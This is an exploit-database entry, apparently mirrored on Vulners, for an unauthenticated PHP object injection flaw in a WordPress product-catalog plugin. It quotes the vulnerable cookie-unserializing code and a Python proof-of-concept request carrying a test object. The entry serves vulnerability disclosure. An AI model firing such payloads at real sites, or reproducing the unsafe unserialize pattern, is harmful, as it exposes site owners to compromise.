Vulners
Lucene search
WordPress Ultimate Product Catalog 4.2.24 Plugin - PHP Object Injection Exploit
# Exploit Title: [WP Plugin Ultimate Product Catalog 4.2.24 PHP Object Injection]
# Google Dork: [NA]
# Date: [Okt 30 2017]
# Exploit Author: [tomplixsee]
# Author blog : [cupuzone.wordpress.com]
# Vendor Homepage: [http://www.etoilewebdesign.com/plugins/ultimate-product-catalog/]
# Software Link: [https://wordpress.org/plugins/ultimate-product-catalogue/]
# Version: [<= 4.2.24]
# Tested on: [Ubuntu Server 16.04]
# CVE : [NA]
tested on app version 4.2.23, 4.2.24
we can send an evil cookie (login not required) to vulnerable function
1. vulnerable code on Functions/Process_Ajax.php <= tested
203 // Adds an item to the plugin's cart
204 function UPCP_Add_To_Cart() {
205 global $woocommerce;
206 global $wpdb;
207 global $items_table_name;
208
209 $WooCommerce_Checkout = get_option("UPCP_WooCommerce_Checkout");
210
211 if ($WooCommerce_Checkout == "Yes") {
212 $WC_Prod_ID = $wpdb->get_var($wpdb->prepare("SELECT Item_WC_ID FROM $items_table_name WHERE Item_ID=%d", sanitize_text_field($_POST['prod_ID'])));
213 echo "WC ID: " . $WC_Prod_ID . "<Br>";
214 $woocommerce->cart->add_to_cart($WC_Prod_ID);
215 }
216
217 if (isset($_COOKIE['upcp_cart_products'])) {
218 $Products_Array = unserialize(str_replace('\"', '"', $_COOKIE['upcp_cart_products']));
219 }
220 else {
221 $Products_Array = array();
222 }
223
224 $Products_Array[] = $_POST['prod_ID'];
225 $Products_Array = array_unique($Products_Array);
226 setcookie('upcp_cart_products', serialize($Products_Array), time()+3600*24*3, "/");
227 }
228 add_action('wp_ajax_upcp_add_to_cart', 'UPCP_Add_To_Cart');
229 add_action( 'wp_ajax_nopriv_upcp_add_to_cart', 'UPCP_Add_To_Cart' );
2. vulnerable code on Functions/Shortcodes.php <= not tested
POC
1. use a WP plugin to test php object injection,
like this one https://www.pluginvulnerabilities.com/2017/07/24/wordpress-plugin-for-use-in-testing-for-php-object-injection/
2. make a request
#-----------------------------------
#! /usr/bin/python
import requests
url = "http://vbox-ubuntu-server.me/wordpress/wp-admin/admin-ajax.php?";
data = {'action':'upcp_add_to_cart'}
headers = {
'Content-type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Cookie': 'upcp_cart_products=O:20:"PHP_Object_Injection":0:{}'
}
r = requests.post(url, data=data, headers=headers)
print r.content
#------------------------------------
# 0day.today [2018-04-11] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Oct 2017 00:00Current